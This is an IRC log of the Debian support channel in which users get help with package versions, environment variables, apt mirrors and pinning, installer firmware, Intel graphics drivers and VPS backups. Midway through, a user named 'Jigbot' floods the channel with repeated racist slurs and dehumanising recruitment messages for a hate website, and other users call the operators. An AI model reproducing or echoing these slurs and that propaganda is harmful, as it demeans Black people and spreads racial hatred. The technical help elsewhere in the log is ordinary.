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0[00:00:06] <Brigo> ,v selinux-policy-default
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1[00:00:07] <judd> Package: selinux-policy-default on amd64 --
wheezy: 2:2.20110726-12; stretch: 2:2.20151208-1; stretch:
2:2.20161023.1-7; sid: 2:2.20161023.1-8
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6[00:01:49] <Brigo> ,v php5
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7[00:01:50] <judd> Package: php5 on amd64 -- wheezy:
5.4.45-0+deb7u2; wheezy-security: 5.4.45-0+deb7u6; jessie:
5.6.29+dfsg-0+deb8u1; jessie-security: 5.6.29+dfsg-0+deb8u1
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8[00:01:59] <Brigo> burnthishome, Jessie?
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11[00:02:27] <burnthishome> Brigo, yes Im running Kali rolling
which is based on Debian Jessie
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12[00:02:38] <Brigo> let me guess:
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13[00:02:42] <Brigo> !kali
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14[00:02:42] <dpkg> Kali Linux (replaced-url
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15[00:03:03] <Brigo> i knew dpkg would know it :)
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17[00:03:35] <Brigo> burnthishome, i hint would be there is no
"rolling" in Debian.
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19[00:04:10] <burnthishome> It's just forked debian jessie
packages
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20[00:04:31] <Brigo> burnthishome, it looks like it isn't.
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22[00:05:02] <OerHeks> burnthishome, time to read their package
list
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23[00:05:12] <OerHeks> anyway, offtopic in #debian
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25[00:05:37] <Brigo> you are welcome :D
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27[00:06:14] <Brigo> OerHeks, we shouldn't bother a guy
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45[00:14:01] <Toordog> is anyone noticed the gpg key for the
repository for debian wheezy puppet is expired since 2017-01-05 ?
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49[00:15:54] <TomTomTosch> which repository exactly?
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59[00:18:52] <TomTomTosch> either way, you might want to
contact the third party responsible for said repository.
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70[00:22:41] <solosoft> ls
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73[00:23:07] <Iridos> puppet?
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74[00:23:44] <tomcres> !puppet
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75[00:23:44] <dpkg> Puppet is an open source configuration
management tool for automating system administration tasks.
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76[00:23:56] <Iridos> I know that
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77[00:24:17] <nixb0y> How to enable the guest account in debian
8?
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78[00:24:28] <Iridos> but I don't know what "the
repository for debian wheezy puppet" is supposed to be
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79[00:24:36] <Iridos> judd, versions puppet
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80[00:24:37] <judd> Package: puppet on amd64 --
wheezy-security: 2.7.23-1~deb7u3; wheezy: 2.7.23-1~deb7u3;
wheezy-backports: 3.7.2-4~bpo70+1; jessie: 3.7.2-4;
jessie-backports: 3.8.5-2~bpo8+1; stretch: 4.5.2-1; stretch:
4.8.1-1; sid: 4.8.2-1
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81[00:24:54] <Iridos> maybe he just means main
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82[00:25:06] <TomTomTosch> i just guess they meant the
repository upstream provides.
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84[00:25:44] <nixb0y> does anyone know how to enable the guest
account ??
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85[00:25:47] <Iridos> it's probably not worth speculating
then, as we guessed differently ^ ^
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94[00:26:46] <Iridos> what is "the guest account"
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96[00:27:23] <missmbob> it's best not to ask such
questions. otherwise they remain
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97[00:27:29] <nixb0y> Iridos: when you click on 'switch
user' ... there should be a guest account... like a temporary
account
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102[00:28:37] <SynrG> "should"?
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103[00:28:58] <SynrG> or are you just comparing to another
distro and expecting debian to be the same?
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104[00:29:06] <Toordog> Hi, I meant that the repository of
puppetlabs desserving the package puppet for debian wheezy is using
an expired gpg key. I was wondering if it was something to worry
about or if it is normal and ok to ignore.
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106[00:29:16] <awal1> nixb0y, lightdm?
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107[00:29:16] <nixb0y> SynrG: no i'm not
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108[00:29:32] <SynrG> nixb0y: so this is something that debian
does and it's not working for you?
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111[00:29:46] <missmbob> i've never seen it
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112[00:29:56] <awal1> if yes, edit it's config file
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113[00:30:05] <nixb0y> awal1: i'm using gdm.. does it have
a guest account?
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114[00:30:17] <awal1> no idea
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115[00:30:26] <SynrG> dm's don't ... have accounts ...
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116[00:30:32] <SynrG> systems have accounts
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117[00:30:48] <Iridos> I wonder if I've ever seen such a
guest account on any distro… there seems to be some memory
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118[00:30:51] <Toordog> pub 4096R/4BD6EC30 2010-07-10 [expired:
2017-01-05] ---- uid Puppet Labs Release Key (Puppet Labs Release
Key) <info@puppetlabs.com>
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119[00:31:05] <SynrG> Toordog: so, talk to puppetlabs, i guess
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120[00:31:13] <missmbob> Iridos: chromeos. that's close and
they have it
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121[00:31:14] <SynrG> maybe they don't care about wheezy?
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123[00:31:20] <Iridos> but then one wonders how that would
technically be done
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124[00:31:26] <awal1> SynrG, lightdm have stuff related to guest
account in it's config file (but not sure how all that works)
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125[00:31:35] <SynrG> ok ...
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126[00:31:42] <SynrG> i guess the doc would say?
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127[00:31:46] <missmbob> Toordog: we've already talked
about you
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128[00:31:46] <Toordog> alright, though the package maintainer
could be here as well ;)
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130[00:32:38] <Iridos> missmbob, only I don't think I ever
had contact with that… but interesting
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131[00:32:39] <SynrG> debian doesn't use keys to sign repos
that are from third parties ...
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134[00:32:56] <awal1> ubuntu (lightdm) have guest account
enabled by default; nixb0y may wanted to reproduce that :P
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135[00:32:59] <SynrG> so whether or not someone is
coincidentally here that knows about it, it's offtopic for here
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137[00:33:18] <Toordog> ok thx for the info SynrG, i will switch
this topic to #puppet
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141[00:33:31] <nixb0y> awal1: i want to use debian ;)
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143[00:33:41] <missmbob> Toordog: start there next time please
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144[00:34:08] <nixb0y> awal1: I don't like ubuntu because
of how buggy it became :p
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145[00:34:37] <graps> awal1: What bugs are you inferring ?
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146[00:34:42] <nixb0y> awal1: i'm not sure how to enable
the guest session in debian 8 gnome
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147[00:35:02] <SynrG> ah, guest "session" makes more
sense than guest account.
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150[00:35:21] <graps> nixb0y: What bugs are you inferring ?
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151[00:35:25] <SynrG> maybe it sets up something that
doesn't save any files?
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153[00:36:13] <awal1> nixb0y, I use 'wdm' but I know
'lightdm' have features for guest ·something";
no clue about gdm3; sorry
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157[00:37:04] <nixb0y> graps: everything in ubuntu is buggy...
you can't do your daily things on it
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158[00:37:11] <SynrG> ditto. i exclusively use lightdm and
don't have any gdm3 to consult anymore
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159[00:37:38] <nixb0y> SynrG: yes. it's a temporary
session, removes everyting once the use logsout or reboot the system
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160[00:37:40] <graps> nixb0y: Oh. I was concerned with using it
as a web server, for light traffic web hosting
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161[00:38:42] <graps> nixb0y: So far, my Debian web server is
great. No lag, good uptime and all
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163[00:39:25] <nixb0y> graps: it's up to you if you want to
try it.. but my advice use debian or centos
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164[00:39:28] <Iridos> seems the guest account is a lightdm
feature… and it runs some arbitrary script to set that guest
account up
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166[00:40:01] <SynrG> an adduser, and then on logout a deluser
and erase all the files?
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168[00:40:40] <nixb0y> SynrG: yes, and the home folder lives on
/tmp
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172[00:41:21] <missmbob> that sounds pretty stupid
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179[00:42:11] <Iridos> I don't think the script to set up
such an account is in debian… at least, I don't see
anything
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180[00:43:03] <SynrG> i don't think it's stupid. but
it does imply a certain amount of trust towards people with access
to your system.
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183[00:45:19] <teraflops> tmpfs if youre short of ram sounds
like a bad idea
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184[00:45:27] <Iridos> maybe we can compromize saying it sounds
a *bit* stupid
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186[00:45:51] <awal1> nixb0y, according to this
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188[00:46:15] <missmbob> it all makes sense now
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190[00:46:40] <awal1> debian doesn't have
/etc/guest-session for start...
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195[00:48:59] <oty> hey. Any idea why tor won't update
anymore ? Says "wrong signature" everytime
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197[00:50:21] <drm> I am running LXDE on debian8. I have added
JAVA_HOME with its url to my .profile, my .bashrc, my /etc/profile,
and my /etc/environment. I have also 'source'd all these
files. And yet, every time I log out and log back in, and type
'env' in the terminal, no JAVA_HOME is set. This is a
problem for some of my applications since they need java and are
running outside of my terminal. Does anyone know of anything in deb8
or LXDE that would reset envi
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198[00:50:22] <drm> ronment variables on or after login?
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199[00:51:04] <nixb0y> awal1: thanks amn
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200[00:51:06] <nixb0y> man *
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203[00:53:59] <SynrG> drm: did you export the variable?
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208[00:56:44] <drm> SynrG, i have exported it in .bashrc,
.profile, and /etc/profile. I have attempted to export it out of
/etc/environment (which didn't work either), but all the stuff
on SO says there is no benefit to doing so since /etc/environment is
not an executable script
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213[00:58:22] <oty> drm: could you paste what you did to export
the variable ? Maybe there is a basic mistake ?
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214[00:58:36] <Iridos> +1
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215[00:58:39] <awal1> nixb0y, why you want an guest session?
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216[00:58:44] <drm> sure, give me a few to throw it up on
paste.debian
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218[00:59:08] <awal1> just create a new user with limited
privileges
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219[00:59:33] <velix> Is this ACL correct to create a shared
directory for all users in group "shared"? I've
tested it, it works. But I want your opinion:
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222[01:00:28] <Toordog> i'd need more info about the gpg
key for repository with apt. How the keys system works? If I have a
old key and this key expired, will it be removed and updated
automatically? Will it update but key the old key ?
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227[01:01:12] <teraflops> drm: output of `echo $JAVA_HOME` and
`printenv | grep java` is fine too^
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230[01:01:36] <HeXiLeD> netbook situation. VGA output used for
19" monitor. I would like to get the built in screen (LVDS1)
auto turned off once the netbook detects external monitor connected.
Are there any debian docs about this ?
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234[01:02:19] <drm> teraflops, `echo $JAVA_HOME` works out of my
terminal, but anything running out of /usr or other lower level
folders sees nothing when you echo JAVA_HOME
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237[01:02:37] <teraflops> drm: the path is wrong?
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238[01:02:58] <teraflops> jre jre/bin ?
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239[01:03:06] <teraflops> share the output not your opinion
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241[01:03:21] <velix> Anyone into ACL? :)
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242[01:03:33] <bazhang> velix, yes
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243[01:03:55] <velix> bazhang: Could you please have a look at
the lines I just posted?
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244[01:03:59] <drm> teraflops, in my terminal the path is
correct, so bash is reading the variable in from .bashrc correctly,
but anything outside of my user environment does not have it
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246[01:04:17] <teraflops> ah
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250[01:05:39] <oty> drm : reboot and it will be right.
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251[01:05:45] <SynrG> HeXiLeD: i don't have an answer, but
i did have a permanently docked netbook and just ran xrandr to turn
off the LVDS upon login (via lightdm hook to do that)
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252[01:05:45] <drm> oty, teraflops here all all the scripts
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253[01:05:47] <oty> I guess
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255[01:06:32] <SynrG> HeXiLeD: i suppose that could be adapted
to test for the existence of a display by parsing the output of
xrandr or so ...
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256[01:06:46] <SynrG> HeXiLeD: or else i'm sure there are
plenty of examples floating around on the net
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257[01:07:13] <oty> drm: (if by "outside of my user
environment" you mean the tty 'n all, you must reboot, or
relogin as user "su -l <USER>")
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261[01:08:35] <drm> oty I have logged out of my account various
times, and then logged back in. So you are saying the system needs a
full reboot? ok, give me a minute
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262[01:08:41] <themill> drm: there should be no need to set
JAVA_* environment variables. What are you trying to do?
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264[01:09:17] <oty> drm, errh. I'm not sure to understand
what you meant by "outside my user environement", in fact.
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265[01:09:22] <velix> small update, could anyone have a look
please?
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266[01:09:35] <SynrG> HeXiLeD: my lightdm.conf had:
display-setup-script=xrandr --output LVDS1 --off --output VGA1
--auto
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267[01:09:59] <oty> drm, I doubt rebooting would do anything
more than reloging.
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268[01:10:02] <SynrG> (but as i said, that *unconditionally*
turns it off)
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269[01:10:09] <HeXiLeD> i am also looking at video=LVDS-1:d
video=VGA-1:e at kernel lever
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270[01:10:12] <HeXiLeD> *level
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272[01:10:21] <drm> themill, oty I am running scala atm, and one
of the startup scripts (which run out of /usr/bin/ ) listens for the
JAVA_HOME variable as part of its initialization process
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275[01:10:57] <themill> drm: nothing in debian should require
JAVA_HOME to be set to function
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277[01:11:27] <drm> putting an `echo $JAVA_HOME` script in
/usr/bin and running it shows that the variable is not set for
things running out of there,
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280[01:11:44] <SynrG> HeXiLeD: and this snippet might be useful
for the rest: xrandr | grep ' connected' | cut -d'
' -f1
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281[01:11:55] <drm> themill, not sure what to tell you, but this
script is listening for it, and im not sure what other applications
out there might be doing the same
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282[01:11:58] <SynrG> HeXiLeD: "some assembly
required" ;)
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285[01:12:15] <themill> drm: things should honour JAVA_HOME if
set; they must not require it to be set
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290[01:13:15] <drm> themill, that may be the case, however at
this point I would also like to get to the bottom of why, if I set a
system-wide environment variable, that variable is getting lost on
re-login
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292[01:13:39] <helpmepls> Anyone here who can help me? I'm
stumped on two questions for Linux+ practice exam..
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294[01:13:57] <bazhang> helpmepls, ##linux
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295[01:14:11] <helpmepls> tried, unregistered, but i'm
waiting in ##linux-overflow
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297[01:14:12] <helpmepls> thanks
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298[01:14:16] <helpmepls> ill just wait
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300[01:14:27] <bazhang> then register helpmepls
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320[01:24:28] <HumanAI> lol
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321[01:24:35] <HumanAI> piece of shit
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325[01:25:34] <drm> oty, i tried a full reboot, didnt work
sadly, im thinking ill just put a script to source the JAVA_HOME on
login, you wouldnt happen to know what folder I should put such a
script in would you?
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328[01:26:12] <swulf--> Just installed debian on a new laptop
with an intel integrated chip + nvidia 1060 card; X boots up (with
"intel" driver) and the gdm3 login screen is in 4K (2160p)
resolution, but when I log in it changes to 864x486... how do I keep
it in 4K? the display settings don't list the option
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336[01:30:00] <themill> drm: your terminal is likely running a
login session (thus .profile is relevant) while your dm and so
anything run from the menu system is not running a login session and
doesn't source .profile.
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339[01:30:16] <koz_> I'm having difficulties running
'sudo apt-get update' - I keep getting 'Writing more
data than expected' errors.
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340[01:30:25] <koz_> I've tried all the fixes I could find
by Googling: none work.
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341[01:30:33] <koz_> Could someone help me figure out wtf is
going on?
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344[01:30:59] <themill> koz_: what mirror are you using?
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347[01:31:29] <koz_> themill: ftp.nz.debian.org
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349[01:32:14] <themill> koz_: istr I can't check that one
from outside NZ ... try a different one. It sounds like Release and
Packages are out of sync
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351[01:33:04] <HumanAI> apt-get should use torrent protocol
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352[01:33:14] <koz_> themill: Is there a master list of all the
mirrors someplace?
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353[01:33:20] <themill> HumanAI: that's enough, thanks
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355[01:33:28] <themill> !mirror list
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356[01:33:28] <dpkg> The best mirror for most users is
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357[01:33:33] <drm> themill, so if i wanted to put a script that
would source /etc/profile when I log in, where would I want to put
that?
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359[01:33:44] <themill> koz_: deb.debian.org is a redirector
that works well
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362[01:34:07] <themill> drm: depends on your DM and/or your DE.
I don't use either of the ones you use...
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363[01:34:11] <koz_> So I just replace
'ftp.nz.debian.org' with 'deb.debian.org' and
call it a day?
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364[01:35:01] <themill> pretty much. I don't know how fast
fastly will be in nz... that's the disadvantage
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365[01:35:11] <koz_> themill: It's fast enough. Thanks!
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367[01:36:18] <Vizva> if i use xfce in stretch no problem but
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384[01:44:57] <zykotick9> DEs + testing = issues <- IMO...
ymmv!
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402[01:57:04] <awal1> hm, so mpv have no dependencies on mplyer
at all; it works great via cli for both audio/video & local
files/online stuff. I thought it was just another front-end for
mplayer :P
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404[01:57:16] <missmbob> tsk tsk
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405[01:57:24] <missmbob> i backported it for jessie if you want
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406[01:57:44] <awal1> backported what? mpv?
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407[01:57:50] <missmbob> yeah
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410[01:58:04] <missmbob> i wanted the newer sexy gui
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412[01:58:27] <awal1> I have it in my sid machine yet, which is
what I run for daily use. but thanks :P
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417[02:00:48] <awal1> mpv has a nice/basic gui also (gnome-mpv)
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420[02:01:58] <zykotick9> missmbob: imo, the beauty of mpv is no
gui... ymmv ;)
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422[02:02:10] <missmbob> i didnt even realize that existed.
didnt even install the deb for gnome-mpv
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427[02:06:15] * zykotick9 is even happy mplayer is returning with
stretch (only for the framebuffer support) that i think, mpv
cleverly dropped (apple-style = throw it out and buy a new one
'cause we don't support that anymore)
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441[02:14:22] <wondiws> why can't you just add the wifi
firmware to the installation images? Nobody cares about those legal
details
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446[02:15:16] <wondiws> help!
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448[02:15:38] <wondiws> anybody here?
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449[02:15:47] <missmbob> !firmware iso
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450[02:15:47] <dpkg> Unofficial <netinst> images -
containing non-free Debian <firmware> packages - for
installing Debian 8 "Jessie" are available from
replaced-url
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451[02:15:52] <missmbob> we did
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453[02:16:36] <wondiws> missmbob, I'm now at the step
detect network hardware, I see you can load it from removable media
as well
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455[02:16:51] <wondiws> but the installer doesn't accept my
usb stick :(
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456[02:17:04] <missmbob> the iso with them is easier
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458[02:17:44] <awal1> wondiws, you want it easy or you prefer
headache?
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462[02:18:23] <awal1> !firmware image
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463[02:18:23] <dpkg> Unofficial <netinst> images -
containing non-free Debian <firmware> packages - for
installing Debian 8 "Jessie" are available from
replaced-url
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466[02:19:04] <missmbob> me calling it up a minute ago wasnt
enough? had to have the big canadian man do it again? :P
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468[02:19:55] * zykotick9 wonders, has that load firmware from install
worked for _anyone_ at *any* time? <- he KNOWs it has! but has
only seen issues in #d irc....
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470[02:20:38] <missmbob> i've never had a separate usb
stick to use. i always just have the one i'm installing from
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473[02:21:05] <wondiws> I'm downloading the iso now, as it
fails to load firmware from usb and mmc
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475[02:21:46] <zykotick9> wondiws: you're NOT alone with
having issues with that!!! it _can't_ be documented very
clearly is all i have to say!
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477[02:21:58] <missmbob> i dont care to try to understand what
you just said. how do you plan to copy this iso to the usb flash?
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482[02:23:45] <missmbob> if you say rufus i swear to awal1
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486[02:24:17] * zykotick9 thinking "cp foo.iso /dev/sdb"
[<- assuming sdb is the USB!!! DANGER if not!!!] is the best
instruction for debian hybrid iso images to USB (works with sudo
where cat breaks)
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487[02:24:40] <missmbob> yes. that. do that wondiws ^
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488[02:24:49] <theluckymike> in ssh config file, I want to add
host username to be used as logged in username, what is $ variable
for it?
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495[02:27:03] <jim> HumanAI, apt already can do 2 or 3
protocols, it's kinda a plugin thing... if you want, you can
look into adding torrent... some of the cd images were distributed
using torrent, so I dunno, but maybe it could be a good thing. one
thing, it could take a lot of work
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496[02:27:50] * zykotick9 doesn't think apt torrent really caught
on... ymmv?
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499[02:28:24] <_Vi> How do I override pin priority for packages
from specific external repository from source.list.d ?
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502[02:29:08] <zykotick9> _Vi: [personally, I have no freakin
clue! sorry, but comment from peanut gallery] those that understand
pinning, know not to use it ;)
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503[02:29:56] <awal1> missmbob: I was distracted watching
youtube stuff; I havent seen you called dpkg :P
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504[02:30:29] <jim> exactly, ymmv -and- after you get the
plugins working, getting the archive setup for it will also take
some work
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505[02:30:31] <missmbob> awal1: i was just having fun. i had
"it's a man's world" playing in my head
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506[02:30:40] <_Vi> The apt_preferences(5) manpage is not clear.
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507[02:30:40] <GenTooMan> Anyone have suggestions on how to have
any OpenGL support on an EEPC 1005ha? It works great just wanted to
see if OpenGL support was possible with the GMA950 display device.
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508[02:30:43] <awal1> lol
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511[02:31:34] <_Vi> I tried something like 'Pin: origin
"replaced-url
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512[02:32:06] <missmbob> i dont know if that's an example
or what you're actually thinking of doing but that sounds
terrible
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514[02:33:09] <zykotick9> GenTooMan: you need to share the
graphics info, lspci -nn for the pciid i think... it it intel
graphics or something else?
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515[02:33:25] <zykotick9> s/it it/is it/
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522[02:36:33] <TomTomTosch> _Vi: show us the whole preferences
file, please. > paste.debian.net
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524[02:37:37] <_Vi>
replaced-url
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525[02:38:17] <ryouma> is there anything in debian that will
allow me to play last.fm (through browser or a standalone client)
safely? it seems to want me to sign up with spotify, which breaks
and says "installing". i don't understand any of
this. i do not want to download a spotify client if it is not part
of debian and thus trustable. is there a debian solution? if not,
can i virtualize?
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526[02:39:03] <_Vi> I want deb-multimedia to be available, but
not be a target of auto-upgrades. It has versions of the form
"10:some_obsolete_version".
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527[02:39:41] <zykotick9> !dontbreakdebian
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528[02:39:41] <dpkg> i heard dont break debian is
replaced-url
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529[02:39:51] <missmbob> !dmo
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530[02:39:52] <dpkg> We recommend against using
deb-multimedia.org; these unofficial packages are known to cause
many hard to debug problems. They are not in Debian either because
the they are poor in quality or for legal reasons. See
replaced-url
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531[02:40:01] <missmbob> with those people especially
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534[02:41:07] <_Vi> !dmm pinning
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535[02:41:07] <dpkg> To ensure that you only get the packages
you really want from deb-multimedia.org, «echo -e
'Package: *\nPin: origin "replaced-url
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537[02:41:17] <Jigbot> Tired of niggers?
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538[02:41:23] <Jigbot> Sick of their monkeyshines?
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539[02:41:26] <Jigbot> We are too!
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540[02:41:39] <ryouma> !ops
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541[02:41:40] <dpkg> Please invoke 'dpkg: ops
$problem' to call the operators to deal with a specific
problem. Misuse of this will lead to a ban. Operators can also be
contacted in the #debian-ops channel.
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543[02:41:51] <Jigbot> Join shitskin.com
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544[02:41:56] <TomTomTosch> _Vi: also the output of apt-cache
policy ffmpeg , please.
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545[02:41:59] <Jigbot> At Shitskin, we are not White
supremacists!
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546[02:42:05] <Jigbot> I myself am a Mexican!
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547[02:42:10] <bazhang> !ops | Jigbot
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548[02:42:10] <dpkg> Hydroxide, dondelelcaro, LoRez, RichiH,
mentor, abrotman, Maulkin, stew, peterS, Myon, Ganneff, weasel,
zobel, themill, babilen, SynrG, jm_, somiaj, jelly: bazhang
complains about: | Jigbot
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549[02:42:16] <Jigbot> Basically, if you are sick of niggers and
aren't a nigger, we want you!
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550[02:42:17] <zykotick9> _Vi: wow, deb-multimedia didn't
support pinning when i used it... (it was called something else at
that time) TIL.
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551[02:42:28] <Jigbot> Join today to unite in the epic battle
against the feral negroid beast
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552[02:42:30] <Jigbot> Join today!
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553[02:42:34] <_Vi> TomTomTosch, The output was OK. The problem
was afterwards with command like "apt-get install libsmth -t
jessie-backports". It refused. I removed the pin and it worked.
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554[02:42:39] <Jigbot>
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555[02:42:46] <Jigbot> Shitskin, where niggerhaters unite!
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556[02:42:48] <_Vi> But I pinned to -1 instead of 101...
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557[02:42:55] <Jigbot> Niggerhaters of all non-negroid races!
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559[02:43:11] <HeXiLeD> SynrG: DISPLAY=:0.0 xrandr --output
LVDS1 --off --output VGA1 --mode 1920x1080 --rate 60 to
fluxbox/startup or /etc/X11/Xsession.d/something.conf works
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560[02:43:24] <_Vi> Also "apt-cache policy ffmpeg"
showed difference only with "Package: ffmpeg", not with
"Package: *".
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561[02:43:33] <HeXiLeD> now i just woult like to have in auto
detect mode
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562[02:43:58] <TomTomTosch> i know what it does. i want to see
the priorities it assigned....
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563[02:45:02] <_Vi> deb-multimedia is useful including because
of one can install license-shady things from it easily.
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564[02:46:10] <somiaj> HeXiLeD: you can also set display stuff
in /etc/X11/xorg.conf.d/ config snippits directly without having to
run xrandr after xorg loads
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565[02:46:29] <somiaj> !deb-multimedia
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566[02:46:30] <dpkg> We recommend against using
deb-multimedia.org; these unofficial packages are known to cause
many hard to debug problems. They are not in Debian either because
the they are poor in quality or for legal reasons. See
replaced-url
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568[02:46:56] <somiaj> though unsure if they are getting any
better, I think deb-multimedia repos (the pure blend) is different
than that repo
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569[02:47:12] <HeXiLeD> somiaj: i am thinking just using default
xorg
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570[02:48:18] <somiaj>
replaced-url
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571[02:48:34] <_Vi> somiaj, Already issues a while above.
Primary reasons for using deb-multimedia: 1. Sometimes early access
to new version (when backport is not yet available); 2. More codecs
and filters <= "They are not in Debian either because the
they are poor in quality or for legal reasons"
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572[02:49:38] <somiaj> zykotick9: apparentally it does work
provided you install from CD which not many people do, usb installs
seem to not work the same due to how it looks for it on the usb
thumbdrive (which may be what you are installing from)
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573[02:49:41] <_Vi> Previously there was reason 0. true ffmpeg
instead of libav.
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576[02:50:28] <somiaj> _Vi: I have yet to find multimedia that
I'm not able to play with what is in debian, only thing I have
gotten outside is libdvdcss and I compile that from source.
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578[02:50:37] <somiaj> _Vi: but I admit, my needs may not be as
much as someone else
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584[02:51:10] <somiaj> _Vi: my suggestion is compile the stuff
you need, less likely a poor quality repo/package will mess with
yoru core system, and put thigns in /usr/local and maybe something
like stow to help manage.
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590[02:51:58] <missmbob> i was helping someone a couple months
back with random iceweasel crashes. turned out to be from a dumb dmo
library. their quality is not okay
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591[02:51:59] <_Vi> somiaj, This way is also in use, but for
trickier things. Being integrated into the system has advantages.
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593[02:52:23] <_Vi> missmbob, That's why I want to use DMO
selectively, not automatically.
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598[02:54:04] <somiaj> _Vi: it is hard to use a repo
selectivally...but choice is yours, we are just trying to give some
alternatives which may have less bugs.
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600[02:54:24] <GenTooMan> zykotick9: Intel 945GSE is the
graphics GPU Read the debian Wiki but seemed more confusing to me
than anything. I installed MESA however it doesn't seem the X
server supports open GL with mesa installed
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602[02:54:41] <_Vi> somiaj, I though this tricky pinning scheme
is designed for such flexibility/.
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603[02:54:47] <somiaj> GenTooMan: what kernel / debian version
are you using.
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605[02:55:21] <somiaj> _Vi: even then, if something has a
dependency and when you use the -t deb-multimedia the pinning jumps
to 990, and you will pull in depends (such as libaries) that could
replace the debian ones.
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606[02:55:46] <somiaj> _Vi: pinning keeps things from being
installed regurally, but when you do install something from there,
the depends can still cause issues.
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608[02:56:39] <_Vi> somiaj, I will typically see deb-multimedia
in download URLs, so I can memorize potential breaking points or ^C
it.
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611[02:57:09] <_Vi> The problem is requesting usual
except-nonbreaking "apt-get upgrade" and getting
deb-multimedia's versions.
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612[02:57:32] <somiaj> _Vi: it should be okay, for the most
part. People do use those packages...(:
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614[02:58:28] <somiaj> _Vi: debian just has very high stanadards
for packages, and it is a shame to me to see this standards
degrageted by such a repo, but alas, I don't need any of those
packages, so it isn't like I should have much of a say.
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615[02:59:09] <_Vi> In libav epoch of Debian I added
deb-multimedia (or debian-multimedia back then) almost automatically
even if FFmpeg is not really needed at the deployment.
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618[02:59:11] <GenTooMan> somiaj SMP Debian 4.8.15-2
(2017-01-04) kernel / Running Jessie 8.5 I believe. That's what
the kernel version reports itself as.
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620[02:59:31] <somiaj> GenTooMan: have you installed
xserver-xorg-video-intel from jessie-backports as well?
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627[03:02:35] <GenTooMan> somiaj hmmm I would say nay to that
let me check how to do that.
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630[03:05:36] <somiaj> GenTooMan: provided you have
jessie-backports enabled (since you have the backports kernel),
apt-get -t jessie-backports install xserver-xorg-video-intel
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631[03:06:07] <somiaj> GenTooMan: then reboot, maybe the newer
kernel/driver will work better with your card. You can also get mesa
from backports if needed, but the driver should use the jessie mesa
just fine
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633[03:10:26] <GenTooMan> somiaj I will give it a try maybe it
will work ... I've found 3d support under linux a bit messy
especially getting it to work (blew up Gentoo a few times trying
that with Nvidia based drivers).
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635[03:10:55] <zykotick9> somiaj: re firmware from installer -
thanks. i haven't used a physical CD to install debian since
wheezy... and i've never _personally_ tried to load firmware.
i've just seen people in #d having _issues_ with it, and even
the #d veterans seemingly unable to assist...
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636[03:11:05] <somiaj> GenTooMan: I have been using the non-free
nvidia blob for years with no problems. I have laptops with radeon
or intel that work okay, but never tried 3d stuff on them.
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640[03:11:54] <somiaj> zykotick9: oh I see lots of issues, but
one day I was here and got talking about the design. It is designed
to be from a seperate usb drive from a cd install, and just
doesn't seem to work if installing from a usb without a second
stick (and even then it may not work)
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642[03:12:26] <zykotick9> somiaj: which is a GREAT piece of
information to know. thanks.
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651[03:15:26] <zykotick9> GenTooMan: i gotta say, my personal
experience with intel + debian has always been out of the box
working ?!?! i have no idea what to suggest, but if it's a new
chipset you might want to try the kernel from backports if
you're not already running it. best of luck.
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652[03:16:04] <somiaj> yea, that is why I'm pointing him to
the backports driver for xorg too, that is the biggest issue I see
with newer intel cards, just need the kernel/driver from backports
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654[03:16:28] <somiaj> though I'm intersted to see how well
stretch does and if the modesetting driver is better than the intel
one which is the new change.
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657[03:16:46] <zykotick9> somiaj: i've never had to
personally do the backported xorg stuff... but i'm sure for
some cases it's exactly what is needed ;)
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658[03:16:49] <GenTooMan> zykotick9 It's an ancient chipset
actually :D
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659[03:17:08] <zykotick9> GenTooMan: that's weird then...
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662[03:17:26] * zykotick9 run i915 which has issues with testing... is
this testing and not stable?
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664[03:17:53] <awal1> somiaj: I tried to load firmware from usb
installing from dvd; dvd installer doesn't detect the firmware
in the usb. well, I did that for squeeze & wheezy. since then, I
just use the unofficial iso when needed
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665[03:18:31] <somiaj> there was some generation of intel that
just had bad linux support, I forget which it was. Outside of that,
most have just worked.
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666[03:19:44] <zykotick9> somiaj: there was some intel
"branded" but not actually made graphics is some of the
netbook systems... ploubes <-spelling?!?! or something
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668[03:20:16] <GenTooMan> Yeah... keeps complaining
"OpenGL" I should update the DRAM to 2G at least (1G works
fine but 2G is like dirt cheap)
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676[03:22:48] <GenTooMan> somiaj I just checked out a different
application it appears the version of OpenGL is the issue. GREAT I
think MESA should support upto 3.3 at least. I'll have to check
that.
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give the pciid but stated "< GenTooMan> zykotick9: Intel
945GSE is the graphics GPU Read the debian..."
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679[03:23:13] <somiaj> GenTooMan: there is a newer mesa in
jessie-backports
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680[03:24:32] <somiaj> though installing it isn't easy, you
have a lot of libs you have to upgrade correctly to get dependencies
to work out
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was hard to get the right version of Eclipse working on this system
as Jessie doesn't use NEON.1 even. It didn't have the
marketplace option so I had to uninstall and directly install
Eclipse NEON.2 then I was able to install OpenSTM32 and STM32CubeMX
talk about annoying.
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minicom (geesh no serial port software for linux and that ancient
ncurses based tool wow talk about flash back geesh I felt like it
was 1996 suddenly).
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766[04:31:29] <HeXiLeD> as i am trying to setup X11 forward. all
the docs online seem to fail and nothing happens. what could be
causing this ?
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767[04:32:11] <HeXiLeD> debug1: Requesting X11 forwarding with
authentication spoofing. debug1: Sending environment.
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768[04:32:20] <HeXiLeD> and nothing happens
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806[04:58:29] <armando> GenTooMan: you can do what you want most
likely with screen directly without having to mess around with
minicom
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814[05:02:26] <ambient> Hello, I am trying to update tor browser
but get "You might be under attack, or there just may be a
networking problem."
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828[05:12:26] <SpaceAce> can anyone recommend a program to make
an ISO snapshot of a running OS?
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830[05:12:33] <SpaceAce> I want to back up my VPS
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831[05:12:47] <dTal> an ISO snapshot?
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833[05:13:00] <SpaceAce> yes, just a backup to an ISO
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834[05:13:09] <dTal> why an ISO?
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835[05:13:10] <SpaceAce> for downloading and archiving elsewhere
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838[05:13:24] <dTal> as opposed to say a tarball
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839[05:13:31] <SpaceAce> so i can mount it in VM
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843[05:13:42] <SpaceAce> i guess a tarball would suffice
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845[05:14:46] <SpaceAce> mondorescue looks like a decent tool
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847[05:15:06] <dTal> that's a good reason for wanting an
ISO (you can mount tarballs but you need fuse), but it's not
neccesarily a good reason to dump it as an ISO in the first place
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848[05:15:28] <SpaceAce> i've got a dodgy vps service that
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849[05:15:34] <ambient> Hello, I am trying to update tor browser
but get "You might be under attack, or there just may be a
networking problem."
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852[05:17:09] <SpaceAce> backing up the OS while it's
running is the biggest requirement
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856[05:20:01] <SpaceAce> any suggestions, dTal ?
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858[05:20:59] <qman__> SpaceAce: stop all your services, rsync
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859[05:23:22] <ryouma> ambient: tor itself? the tor package?
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860[05:23:27] <SpaceAce> seems pretty straightforward, qman__
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861[05:23:27] <SpaceAce> thanks
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864[05:23:45] <SpaceAce> that'll cover my MySQL database
and web apps, too?
